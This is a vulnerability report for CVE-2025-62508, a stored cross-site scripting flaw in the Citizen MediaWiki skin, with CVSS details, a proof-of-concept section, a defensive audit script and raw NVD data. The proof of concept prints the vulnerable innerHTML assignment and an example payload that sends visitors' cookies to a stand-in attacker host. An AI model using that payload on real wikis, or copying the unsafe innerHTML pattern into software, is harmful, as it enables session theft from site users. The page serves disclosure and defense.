Security Vulnerability Report
CVE-2025-62508 CVSS 6.5 MEDIUM

Published: 2025-10-17 21:15:37
Last Modified: 2026-04-15 00:35:42

Description

Citizen is a MediaWiki skin that makes extensions part of the cohesive experience. Citizen versions from 3.3.0 to 3.9.0 are vulnerable to stored cross-site scripting in the sticky header button message handling. In stickyHeader.js, the copyButtonAttributes function assigns innerHTML from a source element's textContent when copying button labels. This causes escaped HTML in system message content (such as citizen-share, citizen-view-history, citizen-view-edit, and nstab-talk) to be interpreted as HTML in the sticky header, allowing injection of arbitrary script by a user with the ability to edit interface messages. The vulnerability allows a user with the editinterface right but without the editsitejs right (by default the sysop group has editinterface but may not have editsitejs) to execute arbitrary JavaScript in other users' sessions, enabling unauthorized access to sensitive data or actions. The issue is fixed in 3.9.0.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

mediawiki-skins-Citizen >= 3.3.0
mediawiki-skins-Citizen < 3.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
/*
 * PoC for CVE-2025-62508 - Citizen MediaWiki Skin Stored XSS
 * Vulnerability: innerHTML assigned from textContent in copyButtonAttributes function
 * Affected file: stickyHeader.js
 * Affected messages: citizen-share, citizen-view-history, citizen-view-edit, nstab-talk
 */

// Step 1: Attacker with editinterface permission edits MediaWiki system message
// For example, edit the page: MediaWiki:citizen-share
// Set the content to a malicious payload that will be HTML-escaped upon saving
// but interpreted as HTML when rendered via innerHTML

// Example malicious content for MediaWiki:citizen-share:
// <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

// When MediaWiki saves this, it HTML-escapes the content to:
// &lt;img src=x onerror=&quot;fetch('https://attacker.com/steal?cookie='+document.cookie)&quot;&gt;

// Step 2: The vulnerable code in stickyHeader.js executes:
function copyButtonAttributes(sourceElement, targetElement) {
  // Vulnerable line: textContent returns decoded HTML entities
  const labelText = sourceElement.textContent;
  // innerHTML interprets the decoded content as HTML
  targetElement.innerHTML = labelText;
}

// Step 3: When any user visits a page with Citizen skin,
// the sticky header renders the button with the malicious script
// The browser parses the innerHTML content as actual HTML,
// triggering the onerror event handler

// Step 4: The attacker's server receives the victim's session cookie
// or performs other malicious actions

// Verification PoC (simpler test payload):
// Set MediaWiki:citizen-share to: <svg onload=alert(document.domain)>
// After saving (HTML-escaped): &lt;svg onload=alert(document.domain)&gt;
// When rendered in sticky header: alert(document.domain) executes
```
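A defender-side check for the condition described above, as an added example that is not part of the advisory or the Citizen code base: it tests whether an installed skin version falls in the affected range and flags button-label messages whose content contains markup, raw or entity-escaped. The function names and the sample message data are constructed for illustration; the message keys and version bounds are the ones listed on this page.

```javascript
// Added example: message keys and version bounds come from the advisory text;
// function names and sample data are hypothetical.
const AFFECTED_KEYS = ['citizen-share', 'citizen-view-history', 'citizen-view-edit', 'nstab-talk'];

// Compare dotted versions numerically: negative if a < b, 0 if equal, positive if a > b.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Affected range as listed on the page: >= 3.3.0 and < 3.9.0.
function isAffectedVersion(v) {
  return compareVersions(v, '3.3.0') >= 0 && compareVersions(v, '3.9.0') < 0;
}

// Decode the common entities once so markup hidden behind escaping becomes visible.
function decodeEntities(s) {
  return s.replace(/&(lt|gt|quot|amp|#39);/g, (_, e) =>
    ({ lt: '<', gt: '>', quot: '"', amp: '&', '#39': "'" }[e]));
}

// Button labels should be plain text. Flag any audited message whose raw or
// decoded content contains a tag-like sequence. The advisory's key list is
// introduced with "such as", so callers can pass a wider key list.
function auditMessages(messages, keys = AFFECTED_KEYS) {
  const tagLike = /<\s*[a-zA-Z!\/]/;
  return messages
    .filter((m) => keys.includes(m.name))
    .filter((m) => tagLike.test(m.content) || tagLike.test(decodeEntities(m.content)))
    .map((m) => m.name);
}

// Constructed sample: customised interface messages as {name, content} pairs.
const sampleMessages = [
  { name: 'citizen-share', content: 'Share <b>this</b>' },
  { name: 'citizen-view-history', content: 'View history' },
  { name: 'nstab-talk', content: 'Talk &lt;i&gt;page&lt;/i&gt;' },
  { name: 'mainpage', content: '<b>Main</b>' },
];

console.log(auditMessages(sampleMessages));
console.log(isAffectedVersion('3.8.2'));
```

A flagged message is a prompt to review that message's edit history; upgrading to 3.9.0, where the page states the issue is fixed, is the actual remediation.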

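References

https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/e006923c6dbf113c9a025ca186ecc09fe7b93a15
https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/fbb1d4fe9627281567706f3f6fc99a42ce16fdc4
https://github.com/StarCitizenTools/mediawiki-skins-Citizen/security/advisories/GHSA-g955-vw6w-v6pp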

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62508", "sourceIdentifier": "[email protected]", "published": "2025-10-17T21:15:36.587", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Citizen is a MediaWiki skin that makes extensions part of the cohesive experience. Citizen from 3.3.0 to 3.9.0 are vulnerable to stored cross-site scripting in the sticky header button message handling. In stickyHeader.js the copyButtonAttributes function assigns innerHTML from a source element’s textContent when copying button labels. This causes escaped HTML in system message content (such as citizen-share, citizen-view-history, citizen-view-edit, and nstab-talk) to be interpreted as HTML in the sticky header, allowing injection of arbitrary script by a user with the ability to edit interface messages. The vulnerability allows a user with the editinterface right but without the editsitejs right (by default the sysop group has editinterface but may not have editsitejs) to execute arbitrary JavaScript in other users’ sessions, enabling unauthorized access to sensitive data or actions. The issue is fixed in 3.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/e006923c6dbf113c9a025ca186ecc09fe7b93a15", "source": "[email protected]"}, {"url": "https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/fbb1d4fe9627281567706f3f6fc99a42ce16fdc4", "source": "[email protected]"}, {"url": "https://github.com/StarCitizenTools/mediawiki-skins-Citizen/security/advisories/GHSA-g955-vw6w-v6pp", "source": "[email protected]"}]}}